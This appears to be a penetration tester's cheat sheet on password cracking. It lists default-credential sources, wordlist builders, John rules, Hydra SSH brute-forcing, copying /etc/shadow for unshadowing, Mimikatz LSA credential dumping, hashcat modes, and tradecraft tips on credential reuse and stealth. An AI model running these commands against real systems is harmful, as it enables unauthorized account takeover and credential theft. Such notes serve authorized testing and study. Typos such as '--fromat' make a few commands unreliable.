Password Cracking

Default Creds

• https://cirt.net/passwords

• https://default-password.info/

• https://datarecovery.com/rd/default-passwords/

• https://github.com/ohmybahgosh/RockYou2021.txt

Building words lists

Use content from webpages to build a dictionary. This can include company pages, Facebook, twitter, and any other resource gathered when doing OSINT on the target. To grab all words from a page, Use Cewl.

Password Manglers:

• RSMangler

• Crunch

• pydictor

Building Wordlists:

# Grab words form a site
cewl https://example.com -v --with-numbers -w words.txt

# Password Mangeling, High storage cost for longer lists.
python pydictor.py -extend words.txt --leet 0 1 2 11 21 --level 1 --len 4 16 --occur "<=10" ">0" "<=2" -o /possbile/wordlist.lst

# This will create a multiple GB file. You dont have the storage. 
./rsmangler.rb words.txt -yieulcp

John Custom word lists

# Edit the john.conf to adda new rule
vim /opt/john/john.conf

# Adds a year from 1900 to 2099 followd by a special char to each word
[List.Rules:YearSpecialChar]
Az"19[0-9][0-9]"$[!@#$%^&*]
Az"20[0-9][0-9]"$[!@#$%^&*]

# Build the list 
john --wordlist=words.lst --rules=YearSpecialChar --stdout > withYearAndChar.txt

Brute forcing tools

• Burpsuite (intruder): https://portswigger.net/burp

• Hydra: https://github.com/vanhauser-thc/thc-hydra

Hydra:

hydra -l <username> -P <LIST> <ip> <Protocol>

when bruteforcing SSH, you need to specify a timing interval:

hydra -l <username> -P <LIST> <ip> ssh -t4

John to crack windows hashdump:

john --format=NT <hashes.txt> --wordlist=<wordlist.txt>
john --show --fromat=LM <hashfile.txt>

John to crack /etc/shadow

# Create a txt file for /etc/passwd and shadow
cp /etc/passwd passwd.txt
cp /etc/shadow shadow.txt

# Unshadow 
unshadow passwd.txt shadow.txt > unshadowed.txt

# Crack with john 
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

Windows Hashdump

./mimikatz.exe
privilege::debug
lsadump::lsa /patch

hashcat -m 1000 f4ab68f27303bcb4024650d8fc5f973a rockyou.txt

Cracking NTLMv2-SSP

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt 

Wifi Hacking

# Convert PCAP to hashcat: https://hashcat.net/cap2hashcat/index.pl
hashcat -m 22000 file.hc22000 wordslist.txt

Protocols to target

Protocols: telnet, smtp, http, https, smb, rpc, rdp, pop, sql.

Easy ports to hit: 20-23, 25, 80, 443, 135, 139.

General advice

• Specify speed when bruteforcing SSH or you will hit a wall quickly. Using hydra, this is done using the T4 parameter.

• Stop after gaining access to one account. Try its creds on everything, and use its creds for further enumeration. Never forget to try sudo -i for easy escalation.

• Always take a look around the host machines file system when possible. potential low hanging fruit for enumeration. EX: Local user list at /etc/passwd.

• Never crack hashes on target machine. Speed and stealth will be abysmal.

• Identify Hash type